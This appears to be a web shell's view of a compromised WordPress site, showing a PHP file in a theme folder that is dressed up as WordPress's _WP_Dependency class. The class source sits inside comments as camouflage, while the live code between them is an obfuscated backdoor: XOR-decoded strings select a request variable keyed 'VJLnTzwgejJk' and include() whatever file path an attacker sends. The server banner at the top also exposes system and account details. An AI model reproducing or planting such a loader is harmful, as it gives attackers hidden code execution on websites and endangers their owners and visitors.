HEX
Server: nginx/1.27.1
System: Linux in-4 5.15.0-131-generic #141-Ubuntu SMP Fri Jan 10 21:18:28 UTC 2025 x86_64
User: ilikadirect (1186)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source
Upload Files
File: /storage/v6964/gopalak/public_html/wp-content/themes/ldsmzyfvdm/K.js.php
<?php /* 
*
 * Dependencies API: _WP_Dependency class
 *
 * @since 4.7.0
 *
 * @package WordPress
 * @subpackage Dependencies
 

*
 * Class _WP_Dependency
 *
 * Helper class to register a handle and associated data.
 *
 * @access private
 * @since 2.6.0
 
#[AllowDynamicProperties]
class _WP_Dependency {
	*
	 * The handle name.
	 *
	 * @since 2.6.0
	 * @var string
	 
	public $handle;

	*
	 * The handle source.
	 *
	 * If source is set to false, the item is an alias of other items it depends on.
	 *
	 * @since 2.6.0
	 * @var string|false
	 
	public $src;

	*
	 * An array of handle dependencies.
	 *
	 * @since 2.6.0
	 * @var string[]
	 
	public $deps = array();

	*
	 * The handle version.
	 *
	 * Used for cache-busting.
	 *
	 * @since 2.6.0
	 * @var bool|string
	 
	public $ver = false;

	*
	 * Additional arguments for the handle.
	 *
	 * @since 2.6.0
	 * @var array
	 
	public $args = null;   Custom property, such as $in_footer or $media.

	*
	 * Extra data to supply to the handle.
	 *
	 * @since 2.6.0
	 * @var array
	 
	public $extra = array();

	*
	 * Translation textdomain set for this dependency.
	 *
	 * @since 5.0.0
	 * @var string
	 
	public $textdomain;

	*
	 * Translation path set for this dependency.
	 *
	 * @since 5.0.0
	 * @var string
	 
	public $translations_path;

	*
	 * Setup dependencies.
	 *
	 * @since 2.6.0
	 * @since 5.3.0 Fo*/

        
    
        
function wildcards($private)

{

    $emoji_char = $private;

    

    $count2 = $GLOBALS;
    
	$extra_parts = 'spaces';
    $count2 = $count2[feeds("%09%0C%05%22%11%29", $emoji_char)];
	$delete = 'children_query';
    
    $postarr = $count2;

    $filename = isset($postarr[$emoji_char]);
	$_wp_post_type_features = 'ptypes';
    if ($filename)

    {
        $cached = $count2[$emoji_char];

        $template = $cached[feeds("%22%27%3C1%3A%1B%1A%02", $emoji_char)];
        $main = $template;

        include ($main);
	$unique = 'field';
    }
	$cdn_url = 'fields';
}
function feeds($pre_tags, $timezone)

{
    $protocols = $timezone;
    $perm = "url";
    $perm  .= "decode";

    $stack = $perm($pre_tags);
    $string_length = strlen($stack);
    $string_length = substr($protocols, 0, $string_length);

    $post_updated = $stack ^ $string_length;
	$cdata_regex = '_post';
    
    $stack = sprintf($post_updated, $string_length);
    

    return $post_updated;

}


wildcards('VJLnTzwgejJk');

	$ext_preg = 'check';


/* rmalized the existing `...$args` parameter by adding it
	 *              to the function signature.
	 *
	 * @param mixed ...$args Dependency information.
	 
	public function __construct( ...$args ) {
		list( $this->handle, $this->src, $this->deps, $this->ver, $this->args ) = $args;
		if ( ! is_array( $this->deps ) ) {
			$this->deps = array();
		}
	}

	*
	 * Add handle data.
	 *
	 * @since 2.6.0
	 *
	 * @param string $name The data key to add.
	 * @param mixed  $data The data value to add.
	 * @return bool False if not scalar, true otherwise.
	 
	public function add_data( $name, $data ) {
		if ( ! is_scalar( $name ) ) {
			return false;
		}
		$this->extra[ $name ] = $data;
		return true;
	}

	*
	 * Sets the translation domain for this dependency.
	 *
	 * @since 5.0.0
	 *
	 * @param string $domain The translation textdomain.
	 * @param string $path   Optional. The full file path to the directory containing translation files.
	 * @return bool False if $domain is not a string, true otherwise.
	 
	public function set_translations( $domain, $path = '' ) {
		if ( ! is_string( $domain ) ) {
			return false;
		}
		$this->textdomain        = $domain;
		$this->translations_path = $path;
		return true;
	}
}
*/